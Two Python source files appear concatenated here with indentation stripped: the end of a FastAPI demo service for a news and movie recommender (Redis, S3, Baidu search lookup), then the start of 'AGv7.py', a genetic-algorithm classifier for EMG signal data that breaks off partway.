s3_body = connector.join(temp_array)
logging.info("store anonymous user data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['USER_RECORD_FILE_PATH'] + 'user_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
# call aws personalize addUser api
call_personalize_add_user(user_id, temp_array[1])
login_new_user(user_name, user_id)
user_id_in_sever = user_id
visit_count = increase_visit_count(user_name)
response = {
"message": "Login success",
"data": {
"userId": user_id_in_sever,
"visitCount": visit_count
}
}
return response_success(response)
def call_personalize_add_user(user_id, user_sex):
logging.info("Start add new user, user id:{}, user sex:{}".format(user_id, user_sex))
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/add_user/' + user_id
return send_post_request(url, {
'user_id': user_id,
'user_sex': user_sex
})
def get_random_sex():
random_sex_list = ['M', 'F']
return random_sex_list[random.randint(0, len(random_sex_list) - 1)]
def get_random_age():
return str(random.randint(15, 60))
@app.get('/api/v1/demo/news', tags=["demo"])
def get_recommend_news(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_news()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend news list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
news_recommend_list = httpResp.json()['content']
logging.info('new_recommend_list {}'.format(news_recommend_list))
refresh_user_click_data(user_id, news_recommend_list, '1', recommend_type, 'news')
retrieve_response = generate_news_retrieve_response(news_recommend_list)
return retrieve_response
# get user history of click
@app.get('/api/v1/demo/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'news')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.get('/api/v1/demo/movie/click/{user_id}', tags=["demo"])
def click_get(user_id: str, pageSize: str, curPage: str):
logging.info("click_get enter")
page_size = int(pageSize)
cur_page = int(curPage)
click_list_info = get_user_click_list_info(user_id, page_size, cur_page, 'movie')
return response_success({
"message": "click history by user_id: {}".format(user_id),
"totalItems": click_list_info['total_items'],
"curPage": cur_page,
"totalPage": click_list_info['total_page'],
"data": click_list_info['click_list']
})
@app.post('/api/v1/demo/click', tags=["demo"])
def click_post(clickRequest: ClickRequest):
logging.info("click_post enter")
user_id = clickRequest.userId
item_id = clickRequest.itemId
logging.info("user_id:{}, item_id:{}".format(user_id, item_id))
user_click_count = add_user_click_info(user_id, item_id)
click_one_to_portrait(user_id, item_id)
click_hist_to_recall(user_id, item_id, user_click_count)
return response_success({
"message": "clicked item_id: {}".format(item_id)
})
@app.get('/api/v1/demo/portrait/userid/{user_id}', tags=["demo"])
def portrait_get(user_id: str):
logging.info("portrait_get enter")
logging.info('user_id -> %s', user_id)
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/portrait/'+user_id)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
portrait_data = httpResp.json()['content']
logging.info('portrait_data {}'.format(portrait_data))
return {"message": "success",
"data": portrait_data}
@app.post('/api/v1/demo/url', tags=["demo"])
def url_get(urlRequest: URLRequest):
headers = {
'user-agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75',
'Host': 'www.baidu.com',
'upgrade-insecure-requests': '0',
'sec-fetch-dest': 'document',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,'
'application/signed-exchange;v=b3;q=0.9 '
}
title_b64 = urlRequest.title
decoded_bytes = base64.b64decode(title_b64)
title_str = str(decoded_bytes, "utf-8")
logging.info("search: {}".format(title_str))
try:
url = search_by_title(title_str, headers, 10)
except Exception as e1:
logging.error(repr(e1))
url = ''
random_url_list = [
'https://baijiahao.baidu.com/s?id=1690715424093912615&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690666081179071313&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690723015618951721&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690633677458149226&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690664720265254989&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690689899754648251&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690665452297691041&wfr=spider&for=pc',
'https://baijiahao.baidu.com/s?id=1690657878159643108&wfr=spider&for=pc',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10036081365139924887%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9821107029074050546%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9264994315553468968%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_10001786768465709073%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9475883012444359813%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9862364227218649344%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9664070672349907696%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9039212282786529445%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9192155174958843101%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9793602629771651632%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9725620345608597043%22%7D'
'&n_type=0&p_from=1',
'https://mbd.baidu.com/newspage/data/landingsuper?context=%7B%22nid%22%3A%22news_9939917266435866080%22%7D'
'&n_type=0&p_from=1'
]
logging.info(f"url: {url}")
if not url:
logging.warning("give a random url")
url = random_url_list[random.randint(0, len(random_url_list) - 1)]
return response_success({
"url": url
})
def search_by_title(title, headers, timeout):
url = "http://www.baidu.com/s"
if len(title) > 32:
title = title[: 32]
logging.info("search_by_title:'{}'".format(title))
params = {"wd": title, "cl": 3, "ie": "utf-8"}
try:
try_count = 0
while try_count < 10:
res = requests.get(url, params=params, headers=headers,
timeout=timeout, allow_redirects=True)
logging.info("res.status_code: {}, try_count:{}, res.text size: {}".format(res.status_code, try_count,
len(res.text)))
soup = BeautifulSoup(res.text, 'html.parser')
try_count = try_count + 1
if is_success_code(res.status_code) and len(soup.text.strip()) > 0:
break
logging.info("now sleep 1 sec ...")
time.sleep(1)
except ConnectTimeout as e:
logging.error(repr(e))
logging.error("request to '{}' timeout".format(url))
return ''
if not is_success_code(res.status_code):
logging.error(
"request fail to www.baidu.com, status_code:{}".format(res.status_code))
return ''
content_left = soup.select("#content_left")
if not content_left:
logging.info("抱歉没有找到 ...")
logging.info("res.text:{}".format(res.text.strip()))
return ""
logging.info("content_left div size={}".format(len(content_left)))
url = ''
try:
content_left_div = content_left[0]
all_links = content_left_div.find_all('a')
url = find_first_link(all_links)
except Exception as e:
logging.error("title:{}".format(title))
logging.error(repr(e))
return url
def find_first_link(the_links):
for link in the_links:
if 'href' in link.attrs:
href = link.attrs['href']
if href.startswith('http://www.baidu.com/link?url='):
return href
def is_success_code(status_code):
return status_code in [200, 201, 202, 203, 204, 205, 206, 209, 210]
def mock_item_detail():
item_detail_data = {
"id": "6552368441838272771",
"title": "Title for mock",
"url": "www.baidu.com"
}
return response_success({
"message": "mock news detail for news_id: {}".format("6552368441838272771"),
"data": item_detail_data
})
@xasync
def init_news_records_data(type, path, file, key):
logging.info('start init_records_data')
p = Pool(1)
new_callback = partial(load_news_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
@xasync
def init_movie_records_data(type, path, file, key):
logging.info('start init_movie_records_data')
p = Pool(1)
new_callback = partial(load_movie_records_to_redis, type, key)
p.apply_async(func=download_file_from_s3,
args=(MANDATORY_ENV_VARS['S3_BUCKET'], path,
file, MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'],),
callback=new_callback)
p.close()
p.join()
def load_news_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'code': array[1],
'type': array[2],
'title': array[3],
'keywords': array[4],
'url': '-'
}).encode('utf-8'))
file_to_load.close()
logging.info('Load news record... was success.')
def load_movie_records_to_redis(type, key, file):
try:
file_to_load = open(file, encoding='utf8')
except IOError as error:
raise error
for line in file_to_load:
array = line.strip().split('_!_')
if array[-1] != '':
rCache.load_data_into_hash(key, array[0], json.dumps({
'program_type': array[1],
'program_name': array[2],
'release_year': array[3],
'director': array[4],
'actor': array[5],
'category_property': array[6],
'language': array[7],
'ticket_num': array[8],
'score': array[9],
'level': array[10],
'new_series': array[11]
}).encode('utf-8'))
file_to_load.close()
logging.info('Load news record... was success.')
def download_file_from_s3(bucket, path, file, dest_folder):
logging.info('Download file - %s from s3://%s/%s ... ', file, bucket, path)
# Using default session
s3client = boto3.client('s3')
try:
s3client.download_file(bucket, path+file, dest_folder+file)
except botocore.exceptions.ClientError as error:
raise error
except botocore.exceptions.ParamValidationError as error:
raise ValueError(
'The parameters you provided are incorrect: {}'.format(error))
logging.info(
'Download file - %s from s3://%s/%s ... was success', file, bucket, path)
return dest_folder+file
def click_one_to_portrait(user_id, news_id):
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/portrait/'+user_id
send_post_request(url, {
'clicked_item': {
'id': news_id
}
})
def click_hist_to_recall(user_id, news_id, user_click_count):
if user_click_count > 0 and user_click_count % TRIGGER_RECALL_WINDOW == 0:
trigger_recall_svc(user_id)
def trigger_recall_svc(user_id):
window = TRIGGER_RECALL_WINDOW
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/recall/'+user_id
click_list = get_user_click_hist(user_id, window)
return send_post_request(url, {
'user_id': user_id,
'clicked_item_list': click_list
})
def get_user_click_hist(user_id, top_n):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('get user_click_hist {}'.format(redis_click_list))
news_id_list = [item for item in redis_click_list]
news_id_list.reverse()
result = []
for var in news_id_list[0:top_n]:
result.append({"id": var})
return result
def send_post_request(url, data):
logging.info("send POST request to {}".format(url))
logging.info("data: {}".format(data))
if MANDATORY_ENV_VARS['TEST'] == 'True':
return "Test Mode - ok"
headers = {'Content-type': 'application/json'}
r = requests.post(url, data=json.dumps(data), headers=headers)
logging.info("status_code: {}".format(r.status_code))
if r.status_code == 200:
return r.json()
else:
logging.error(r.text)
raise Exception(
"status_code: {}, error POST request {}".format(r.status_code, url))
def add_user_click_info(user_id, news_id):
logging.info("add_user_click_info, user_id: " +
user_id + ", news_id:" + news_id)
click_list = get_list_from_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id)
click_list.append(news_id)
set_value_to_redis(REDIS_KEY_USER_ID_CLICK_DICT, user_id, click_list)
logging.info("done set click_list to {} for {}, list size: {}".format(
REDIS_KEY_USER_ID_CLICK_DICT, user_id, len(click_list)))
update_item_click_action(user_id, news_id)
return len(click_list)
def get_list_from_redis(dict_name, key):
logging.info("get lsit {}[{}] from redis".format(dict_name, key))
list_bin = rCache.get_data_from_hash(dict_name, key)
if list_bin:
list_values = json.loads(binary_to_str(list_bin))
else:
list_values = []
logging.info("return {} items".format(len(list_values)))
return list_values
def update_item_click_action(user_id, news_id):
'''
field -> user_id_action_dict
key -> user_id
value -> [
{
news_id : 0
},
{
news_id : 1
}
]
'''
logging.info("update_item_click_action {}[{}] '{}' = 1".format(
user_id_action_dict, user_id, news_id))
user_action = get_list_from_redis(user_id_action_dict, user_id)
click_data = user_action['click_data']
existed_id_flag = 0
for item in click_data:
if news_id in item:
item[str(news_id)] = "1"
existed_id_flag = 1
break
if existed_id_flag == 0:
user_action['click_data'].append({news_id: '1'})
logging.info('after user_action update: {}'.format(user_action))
set_value_to_redis(user_id_action_dict, user_id, user_action)
def get_user_click_list_info(user_id, page_size, cur_page, scenario):
redis_click_list = get_list_from_redis(
REDIS_KEY_USER_ID_CLICK_DICT, user_id)
logging.info('redis_click_list: {}'.format(redis_click_list))
item_id_list_all = redis_click_list
item_id_list_all.reverse()
total_items = len(item_id_list_all)
total_page = math.ceil(total_items / int(page_size))
from_index = page_size * cur_page
to_index = page_size * (cur_page + 1)
page_item_id = item_id_list_all[from_index:to_index]
click_list = []
if scenario == 'news':
click_list = [get_item_by_id(news_id) for news_id in page_item_id]
elif scenario == 'movie':
click_list = [get_movie_by_id(movie_id) for movie_id in page_item_id]
else:
logging.info("scenario {} is not supported!")
logging.info(
"get_user_click_list_info return click_list size: {}".format(len(click_list)))
return {
"click_list": click_list,
"total_items": total_items,
"total_page": total_page
}
def get_item_by_id(item_id):
logging.info("get_item_by_id start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
item_id, news_detail_record))
return {
'id': item_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com' # TODO
}
def get_movie_by_id(item_id):
logging.info("get_movie_by_id start")
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, item_id), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(item_id, movie_detail_record))
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
return {
'id': item_id,
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, item_id),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(item_id),
'type': movie_detail_record['program_type']
}
def get_item_detail_response(news_id):
logging.info("get_item_detail_response start")
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, news_id), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
news_id, news_detail_record))
data = {
'id': news_id,
'title': news_detail_record['title'],
'url': 'www.baidu.com'
}
return response_success({
"message": "news {} detail success".format(news_id),
"data": data
})
def generate_news_retrieve_response(new_recommend_list):
retrieve_data = []
for element in new_recommend_list:
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, element['id']), encoding='utf-8')
logging.info('news id {} news_detail_record {}'.format(
element['id'], news_detail_record))
data = {
'id': element['id'],
'image': 'https://inews.gtimg.com/newsapp_bt/0/13060844390/1000', # TODO
'title': news_detail_record['title'],
'desc': '{}'.format(element['id']), # TODO
'type': news_detail_record['type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(new_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_movie_retrieve_response(movie_recommend_list):
retrieve_data = []
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
aws_region = MANDATORY_ENV_VARS['AWS_REGION']
for element in movie_recommend_list:
movie_detail_record = json.loads(rCache.get_data_from_hash(
movie_records_dict, element['id']), encoding='utf-8')
logging.info('movie id {} movie_detail_record {}'.format(
element['id'], movie_detail_record))
data = {
'id': element['id'],
'image': 'https://{}.s3-{}.amazonaws.com/{}/movielens-posters/img/{}.jpg'.format(s3_bucket, aws_region, s3_prefix, element['id']),
'title': movie_detail_record['program_name'],
'release_year': movie_detail_record['release_year'],
'director': movie_detail_record['director'],
'actor': movie_detail_record['actor'],
'category_property': movie_detail_record['category_property'],
'new_series': movie_detail_record['new_series'],
'level': movie_detail_record['level'],
'desc': '{}'.format(element['id']),
'type': movie_detail_record['program_type'],
'tag': element['tags']
}
retrieve_data.append(data)
return response_success({
"message": "retrieve news list success",
"totalItems": len(movie_recommend_list),
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def refresh_user_click_data(user_id, items_recommend_list, action_type, action_source, scenario):
logging.info('refresh_user_click_data start')
store_previous_click_data(user_id, action_type, scenario)
new_click_data = generate_new_click_data(
items_recommend_list, action_source)
if rCache.load_data_into_hash(user_id_action_dict, user_id, json.dumps(new_click_data).encode('utf-8')):
logging.info(
'Save user_id_action_dict into Redis with key : %s ', user_id)
logging.info('refresh_user_click_data completed')
def response_failed(body, code):
return JSONResponse(status_code=code, content=body)
def mock_news_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("6552368441838272771"))
count = count + 1
return response_success({
"message": "mock retrieve news list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def mock_movie_retrieve_response():
retrieve_data = []
count = 0
while (count < 20):
retrieve_data.append(get_item_by_id("movie test id"))
count = count + 1
return response_success({
"message": "mock retrieve movie list",
"totalItems": 100,
"curPage": 0,
"totalPage": 1,
"data": retrieve_data
})
def generate_new_click_data(items_recommend_list, action_source):
new_click_data = []
for element in items_recommend_list:
new_click_data.append({element['id']: '0'})
final_click_data = {
'click_data': new_click_data,
'action_source': action_source
}
logging.info(
'generate_new_click_data completed {}'.format(final_click_data))
return final_click_data
def store_previous_click_data(user_id, action_type, scenario):
logging.info('store_previous_click_data start')
user_id_click_data_redis = rCache.get_data_from_hash(
user_id_action_dict, user_id)
if not bool(user_id_click_data_redis):
return
user_id_click_data = json.loads(user_id_click_data_redis, encoding='utf-8')
logging.info('previous click data {}'.format(user_id_click_data))
action_source = user_id_click_data['action_source']
click_data = user_id_click_data['click_data']
logging.info('previous click data action_source {}'.format(action_source))
current_timestamp = str(calendar.timegm(time.gmtime()))
s3_body = ''
connector = '_!_'
action_source_code = '0'
for element in click_data:
temp_array = []
# k is item id, v is action 0/1
for k, v in element.items():
temp_array.append(user_id)
temp_array.append(k)
temp_array.append(current_timestamp)
temp_array.append(action_type)
temp_array.append(v)
if action_source_code == '0':
action_source_code = get_action_source_code(action_source, k, scenario)
temp_array.append(action_source_code)
s3_body = s3_body + connector.join(temp_array) + '\n'
logging.info("store_previous_click_data data{} ".format(s3_body))
s3client = boto3.resource('s3')
if s3_body != '':
s3client.Bucket(MANDATORY_ENV_VARS['CLICK_RECORD_BUCKET']).put_object(
Key=MANDATORY_ENV_VARS['CLICK_RECORD_FILE_PATH'] + 'action_' + user_id + '_' + current_timestamp + '.csv',
Body=s3_body)
logging.info('store_previous_click_data completed')
def get_action_source_code(action_source, item_id, scenario):
if action_source == 'recommend':
return '1'
else:
if scenario == 'news':
news_detail_record = json.loads(rCache.get_data_from_hash(
news_records_dict, item_id), encoding='utf-8')
logging.info('get item detail {}'.format(news_detail_record))
# e.g. 106, 107..
return news_detail_record['code']
else:
# e.g. 'action' or 'crime', movie type
return action_source
def get_user_id_by_name(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
if user_info_dict:
return user_info_dict['user_id']
logging.info("Cannot find user_id by name: {}".format(user_name))
return ''
def login_new_user(user_name, user_id):
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, {
"user_id": user_id,
"visit_count": 0,
"click_count": 0
})
def increase_visit_count(user_name):
user_info_dict = get_dict_from_redis(REDIS_KEY_USER_LOGIN_DICT, user_name)
new_count = user_info_dict['visit_count'] + 1
user_info_dict['visit_count'] = new_count
set_value_to_redis(REDIS_KEY_USER_LOGIN_DICT, user_name, user_info_dict)
logging.info("user_name:{}, visit_count: {}".format(user_name, new_count))
return new_count
def set_value_to_redis(dict_name, key, value):
rCache.load_data_into_hash(dict_name, key, json.dumps(value))
def get_dict_from_redis(dict_name, key):
logging.info("get dict {}[{}] from redis".format(dict_name, key))
val_bin = rCache.get_data_from_hash(dict_name, key)
if val_bin:
val_dict = json.loads(binary_to_str(val_bin))
else:
val_dict = {}
logging.info("return {}".format(len(val_dict)))
return val_dict
def response_success(body):
return body
def binary_to_str(bin_str):
return bin_str.decode('utf-8')
# movie
@app.get('/api/v1/demo/movie', tags=["demo"])
def get_recommend_movie(userId: str, type: str, curPage: str, pageSize: str):
logging.info('Start demo->get_recommend_movie()...')
logging.info('user_id -> %s', userId)
logging.info('recommend_type -> %s', type)
user_id = userId
recommend_type = type
if user_id == 'magic-uuid':
return mock_news_retrieve_response()
logging.info('recommend movie list to user')
# get from retrieve
httpResp = requests.get(MANDATORY_ENV_VARS['RETRIEVE_SERVICE_ENDPOINT'] +
'/api/v1/retrieve/'+user_id+'?recommendType='+recommend_type)
if httpResp.status_code != 200:
return response_failed({
"message": "Not support news type"
}, 400)
movie_recommend_list = httpResp.json()['content']
logging.info('movie_recommend_list {}'.format(movie_recommend_list))
refresh_user_click_data(user_id, movie_recommend_list, '1', recommend_type, 'movie')
retrieve_response = generate_movie_retrieve_response(movie_recommend_list)
return retrieve_response
@app.post('/api/v1/demo/start_train', tags=["demo"])
def start_train_post(trainReq: TrainRequest):
logging.info('demo start_train_post start! change type: {}'.format(
trainReq.change_type))
if trainReq.change_type not in ['MODEL', 'CONTENT', 'ACTION']:
raise HTTPException(status_code=405, detail="invalid change_type")
url = MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT'] + \
'/api/v1/event/start_train'
result = send_post_request(url, {
'change_type': trainReq.change_type
})
logging.info('executionArn: {}'.format(result['executionArn']))
response = {
"message": "Start train success",
"data": result
}
return response
@app.get('/api/v1/demo/offline_status/{executionArn}', tags=["demo"])
def offline_status(executionArn: str):
logging.info("offline_status start, executionArn {}".format(executionArn))
httpResp = requests.get(
MANDATORY_ENV_VARS['EVENT_SERVICE_ENDPOINT']+'/api/v1/event/offline_status/'+executionArn)
if httpResp.status_code != 200:
return response_failed({
"message": "Error"
}, 400)
result = httpResp.json()['status']
logging.info('result {}'.format(result))
return result
def init():
# Check out environments
for var in MANDATORY_ENV_VARS:
if var not in os.environ:
logging.error(
"Mandatory variable {%s} is not set, using default value {%s}.", var, MANDATORY_ENV_VARS[var])
else:
MANDATORY_ENV_VARS[var] = os.environ.get(var)
# Initial redis connection
global rCache
rCache = cache.RedisCache(
host=MANDATORY_ENV_VARS['REDIS_HOST'], port=MANDATORY_ENV_VARS['REDIS_PORT'])
logging.info('redis status is {}'.format(rCache.connection_status()))
logging.info('demo service start')
if __name__ == "__main__":
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
init()
uvicorn.run(app, host="0.0.0.0", port=MANDATORY_ENV_VARS['DEMO_PORT'])
|
AGv7.py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 24 09:40:28 2018
@author: Paulo Augusto
"""
import numpy as np
#from numpy import fft
import matplotlib.pyplot as plt
#import scipy.signal as sig
import os
import random
import emgReaderClass_v2 as erc
import threading
import multiprocessing
import dataPlotter
# This script is compatible with 'emgReaderClass_v2', that
# reads the .csv files generated by 'movementSaver.m', from
# the folder './csv/'
bias=0 # If bias = 1, every cromossome will have a non frequency dependant DNA
maxGen=3000 # The max number of generations
startOver=True # If True, the code will not consider the last simulation
tamPop=500 # Population number
maxFreq=200 # This is the max Frequency to consider #240
freqStep=2 # For freqStep=3 -> The code will consider [1,2,3],[3,4,5], etc# 3
taxaMut=0.01 # The mutation rate
taxaMutMin=0.01 # Minimum mutation rate
taxaMutMax=10.0 # Maximum mutation rate
chanceMut=20 # The chance of mutation (only for the "absolute" mutation)
bestTypes=[] # Logging variable
continuous=False # If True, the code will use a continuous fitness function (not recommended)
binaryFit=False # If True, the fitness of each individual will be 1 for each right guess
# If False, it will be continuous if "continuous" is True, or 1 point if
# it guesses correctly, and 1.5 if it guesses with an confidence above
# a "multFac" threshold
multFac=1.5 #
binaryCrossChance=0.5 # The chance of ocurring a binary cross. 1 minus this
# is the chance of ans mean crossing
vectorialMutationChance=0.5 # The chance of vectorial mutation. 1 minus this is
# chance of an absolute mutation
taxaMutMult=4.0 # The factor by which taxaMut will be multiplied
sourceType='ninapro'
fs=2000
##############################################################################
guid=0 # Individual ID (logging variable)
real=[] # DATA
origin=[] # DATA
fv=[] # DATA
frv=[] # DATA
nArq=0 # DATA
# lastValues, botThs and topThs to be used in each archive
parameters={'bicepsinteiro.txt': [400,20,10],\
'bicepsmetade.txt': [400,20,10],\
'emgwk.txt': [400,20,10],\
'emgmed.txt':[400,20,10],\
# 'xoxoxo.txt':[300,40,30],\
'emgabrindo.txt':[500,20,20],\
'emgapertando.txt':[400,20,20]}
# Method that return the number of right guesses of and individual
def countGuesses(indiv):
arqVec=getArqs()
score=0
for arq in range(0,nArq):
for i in range(0,len(real[arq])):
tam=len(real[arq][i])
x= getFreqVector(fv[arq][i])
x=np.array(x)
pont=x*indiv.cromo.freqFactor
# test.append(pont)
if np.argmax(pont[0]) == arq:
score+=1
return score
# This function just multiplies the chromossome of an individual by the frequency
# vector of an signal, return the result. The position that gets the higher
# number represent from which archive it thinks this signal belongs
def sayWho(indiv,real,fv):
tam=len(fv)
x= getFreqVector(fv)
x=np.array(x)
pont=x*indiv.cromo.freqFactor
return pont
# Gets the *.txt files
def getArqs():
arqVec=[]
for arq in os.listdir('.'):
if os.path.splitext(arq)[1]=='.txt':
arqVec.append(arq)
arqVec.reverse()
return arqVec
# Chromossome class each chromossome mainly consists of an nArqs x (maxFreq/freqStep)
# matrix. Each column represent an archive, and each line represent a set of
# freqStep frequencies
class cromossome:
def getRandomVec(self,n):
v=[]
for i in range(0,n):
v.append(random.random()*2-1)
return v
def __init__(self):
self.freqFactor=[]
n=nArq
for i in range(0,maxFreq/freqStep+bias):
self.freqFactor.append(self.getRandomVec(n))
self.freqFactor=np.matrix(self.freqFactor)
# Individual class
class ind:
def __init__(self):
global guid
self.uid=guid
guid+=1
self.cromo = cromossome()
self.fit=0
self.marker='none'
# This function takes the fft data od an signal, and returns a similar vector,
# but instead of getting one element per frequency it take a number of freqStep
# frequencies, sum it and divide by freqStep
def getFreqVector(fv):
x=[]
tam=float(len(fv))
# for j in range(0,int(tam/2)-5):
# k=int(np.floor(float(j)*fs/tam))
# step=int(np.ceil(tam*freqStep/fs))
# if(k % step == 0):
# if len(x)==maxFreq/freqStep:
# ##### BIAS ######
# if bias==1:
# x.append(-1)
# #################
# break
# x.append(sum(fv[k:k+step+1])*2/tam)
# return x
norm=int(np.ceil(tam*1/fs))
step=freqStep*norm
for j in range(0,norm*maxFreq,step):
x.append(sum(fv[j:j+step])*2/tam)
##### BIAS ######
if bias==1 and j==step*maxFreq-1:
x.append(-1)
#################
return x
# Read the data archives. The original signal is stored in origin. Each signal
# Is stored in real. real[arq][5] will contain the 5th signal of the arq'th file
# (as read by getArqs). The fft data will be stored at "fv" (indexes works the
# the same as for "real"). The frequency vector as got by getFrequencyVector
# is stored at frv
def readArqs(source):
reader=erc.emgReader()
global real,fv,frv
if source=='bioplux':
for arq in range(0,nArq):
origin.append([])
real.append([])
fv.append([])
frv.append([])
reader.lastValues=parameters[arqVec[arq]][0]
reader.topThs=parameters[arqVec[arq]][1]
reader.botThs=parameters[arqVec[arq]][2]
origin[arq],real[arq],fv[arq] = reader.analyzeEmg(arqVec[arq],fs)
elif source=='ninapro':
real,fv=reader.getCsvData('bic')
real=real[0:12]
fv=fv[0:12]
for arq in range(0,len(real)):
frv.append([])
for i in range(0,len(fv[arq])):
frv[arq].append(getFreqVector(fv[arq][i]))
# Fitness method. Each signal frequency vector is multiplied by indiv
# chromossome. The numbers got are reconized as the score of each archive.
# Let's say that the 0th element gets the largest number. That mean this
# individual "thinks" that that signal belongs to archive 4 (getArqs()[0])
# The fitnnes is then calculated by the number of right guesses of each
# individual
def fitness(indiv):
global nArq
score=0
for arq in range(0,nArq):
for i in range(0,len(fv[arq])):
tam=len(real[arq][i])
pont=np.array(frv[arq][i])*indiv.cromo.freqFactor
# print pont
test=pont
if np.argmax(pont) == arq:
if not binaryFit:
###############################################################################
if continuous:
score+=(np.max(pont[0])-np.min(pont[0]))/np.mean(pont[0]-np.min(pont[0]))
###############################################################################
else:
if np.max(np.array(pont)) >=multFac*np.mean(np.array(pont)):
score+=1.5
else:
score+=1
###########################################################################
else:
score+=1
return score
# Population class
class population:
def __init__(self):
self.population=[]
def initPop(self,tamPop):
